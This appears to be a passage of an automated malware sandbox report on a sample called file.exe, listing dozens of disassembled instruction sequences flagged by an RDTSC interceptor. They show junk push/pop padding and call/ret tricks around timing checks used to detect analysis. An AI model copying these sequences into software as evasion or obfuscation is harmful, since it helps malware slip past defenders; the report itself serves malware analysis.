                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973A6D second address: 973B0A instructions: 0x00000000 rdtsc 0x00000002 js 00007F9FD0EA45CAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F9FD0EA45B8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a xor eax, 50BC88A2h 0x00000030 mov bh, 29h 0x00000032 popad 0x00000033 and edi, dword ptr [ebp+122D2C59h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F9FD0EA45B8h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 mov dword ptr [ebp+124500DEh], ebx 0x0000005b xchg eax, ebx 0x0000005c jmp 00007F9FD0EA45BCh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F9FD0EA45C9h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 975CB7 second address: 975CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9FD0CB38B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976250 second address: 976255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97715B second address: 9771CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F9FD0CB38BFh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F9FD0CB38B8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d xor ebx, 4B6EA538h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F9FD0CB38B8h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f or dword ptr [ebp+122D20DFh], ecx 0x00000055 clc 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9771CB second address: 9771E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979139 second address: 9791A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F9FD0CB38B8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F9FD0CB38B8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f or edi, 1B3EAF38h 0x00000045 push 00000000h 0x00000047 add dword ptr [ebp+122D319Dh], edx 0x0000004d xchg eax, esi 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F9FD0CB38BDh 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A2E0 second address: 97A2E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97932D second address: 979336 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9793E8 second address: 9793EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9793EC second address: 979421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jne 00007F9FD0CB38B8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9FD0CB38BFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D2EC second address: 97D2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D2F0 second address: 97D2F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F1B8 second address: 97F1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F1BC second address: 97F1D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F9FD0CB38B8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9801D4 second address: 9801DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9801DA second address: 9801DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F369 second address: 97F387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F9FD0EA45C4h 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E319 second address: 97E328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9803DB second address: 9803E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 981480 second address: 981485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3EA second address: 97E3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9822AB second address: 9822AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97E3EE second address: 97E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9822AF second address: 9822B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983298 second address: 98329D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984406 second address: 984410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9FD0BBDFF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9855EF second address: 9855F5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9855F5 second address: 985606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985606 second address: 98560A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98560A second address: 985614 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD0BBDFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 985614 second address: 98561E instructions: 0x00000000 rdtsc 0x00000002 js 00007F9FD14BA52Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B6F0 second address: 98B6F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B6F4 second address: 98B710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9FD14BA530h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9908DA second address: 9908DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 993A01 second address: 993A1B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD14BA526h 0x00000008 jno 00007F9FD14BA526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jc 00007F9FD14BA526h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997FCF second address: 997FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A825 second address: 99A829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A829 second address: 99A82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A82D second address: 99A833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A833 second address: 99A875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jnl 00007F9FD0BBDFF6h 0x00000013 jc 00007F9FD0BBDFF6h 0x00000019 popad 0x0000001a pop ebx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F9FD0BBE007h 0x00000024 mov eax, dword ptr [eax] 0x00000026 jl 00007F9FD0BBE000h 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A920 second address: 99A924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD66 second address: 92BD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD6A second address: 92BD88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9FD14BA533h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD88 second address: 92BD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7A7 second address: 99E7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7AF second address: 99E7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7B3 second address: 99E7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99E7B7 second address: 99E7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jc 00007F9FD0BBDFF6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA7B second address: 99EAAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD14BA52Fh 0x00000007 jmp 00007F9FD14BA537h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EAAB second address: 99EAC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9FD0BBDFFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC36 second address: 99EC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD14BA536h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EC50 second address: 99EC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDE2 second address: 99EDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDE8 second address: 99EDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDEE second address: 99EDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EDF3 second address: 99EE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9FD0BBE001h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EE0A second address: 99EE49 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9FD14BA526h 0x00000008 jmp 00007F9FD14BA52Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jne 00007F9FD14BA526h 0x0000001d popad 0x0000001e pushad 0x0000001f jmp 00007F9FD14BA539h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EE49 second address: 99EE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EE51 second address: 99EE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EF90 second address: 99EFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9FD0BBE001h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EFAA second address: 99EFC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9FD14BA530h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F116 second address: 99F11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F11A second address: 99F13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F9FD14BA526h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 ja 00007F9FD14BA528h 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F9FD14BA526h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F13C second address: 99F146 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9FD0BBDFF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F146 second address: 99F14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A36AF second address: 9A36B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A36B5 second address: 9A36D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F9FD14BA53Ah 0x0000000c jmp 00007F9FD14BA52Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A3C second address: 9A3A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A40 second address: 9A3A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A46 second address: 9A3A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0BBE002h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F9FD0BBDFF6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3A64 second address: 9A3A6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3D2A second address: 9A3D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3D30 second address: 9A3D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9FD14BA526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A3D3A second address: 9A3D68 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9FD0BBDFF6h 0x00000008 jmp 00007F9FD0BBE006h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F9FD0BBE002h 0x00000015 jo 00007F9FD0BBDFF6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A41D8 second address: 9A41DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A41DD second address: 9A41E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4322 second address: 9A4326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A448B second address: 9A44D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0BBE008h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F9FD0BBE006h 0x00000011 pop eax 0x00000012 jmp 00007F9FD0BBE008h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A44D9 second address: 9A44E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A44E1 second address: 9A44E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9926 second address: 9A9934 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9FD14BA526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9934 second address: 9A9938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA588 second address: 9AA58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA6FF second address: 9AA705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA855 second address: 9AA859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA859 second address: 9AA861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA861 second address: 9AA867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA867 second address: 9AA87E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F9FD0BBDFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F9FD0BBE000h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B052A second address: 9B053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD14BA531h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AF251 second address: 9AF272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0BBDFFFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9FD0BBDFFCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96C98A second address: 96C98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96C98E second address: 96C992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CA66 second address: 96CA6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96CDC6 second address: 96CDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
